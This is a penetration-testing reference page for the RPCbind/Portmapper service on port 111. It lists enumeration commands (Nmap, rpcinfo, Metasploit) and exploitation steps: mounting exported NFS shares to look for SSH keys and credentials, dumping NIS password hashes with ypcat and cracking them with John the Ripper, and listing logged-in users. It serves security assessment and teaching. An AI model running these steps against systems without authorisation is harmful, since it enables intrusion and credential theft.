Portmapper - Port 111/TCP/UDP
Basic info
Port 111 is associated with the RPCbind (Portmapper) service, a critical component of Unix-based systems that maps RPC (Remote Procedure Call) program numbers to the ports their services listen on. It is often queried by attackers to gather information about the target system, such as its operating system, RPC-based services (e.g., NFS, NIS), and even user details.
Default Port: 111/TCP/UDP
Other Ports: 32771 (in Oracle Solaris systems)
Associated Services: RPCbind, NFS, NIS, rusersd
Enumeration Techniques
Nmap
Start with an aggressive Nmap scan to gather initial information about the service:
nmap -sSUC -p 111 <Target>
NSE Scripts in Nmap
Leverage Nmap's built-in NSE scripts for RPC enumeration:
nmap -sV --script=nfs-ls,nfs-statfs,nfs-showmount -p 111,2049 <target-ip>
Rpcinfo
Use the rpcinfo tool to query the RPCbind service for additional details:
rpcinfo -p <target-ip>
Example output:
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100005    1   udp   2049  mountd
The presence of services like mountd indicates NFS might be exploitable.
Metasploit for RPC Enumeration
Use Metasploit's auxiliary modules for RPC enumeration:
use auxiliary/scanner/misc/rpcinfo
set RHOSTS <target-ip>
run
Metasploit automates the extraction of program and version information.
Exploitation Techniques
RPCBind + NFS
If NFS is discovered (commonly on port 2049), use the following tools for further exploitation:
Showmount: enumerate exported NFS shares:
showmount -e <target-ip>
Mount the share: mount the NFS share locally:
mount -t nfs <target-ip>:/share /mnt
Explore files: after mounting, look for sensitive files such as SSH keys, credentials, or configurations.
NIS Enumeration
NIS requires identifying the domain name and server. Use these commands to enumerate:
apt-get install nis
ypwhich -d <domain-name> <server-ip>
# Extract sensitive data (e.g., user credentials)
ypcat -d <domain-name> -h <server-ip> passwd.byname
Output from ypcat can reveal hashed passwords. Crack them with tools like John the Ripper:
john --wordlist=<wordlist> <hash-file>
RPC Users
Check whether rusersd is registered, then use it to enumerate logged-in users:
rpcinfo -p <target-ip> | grep rusersd
Tools like rusers provide user enumeration:
rusers <target-ip>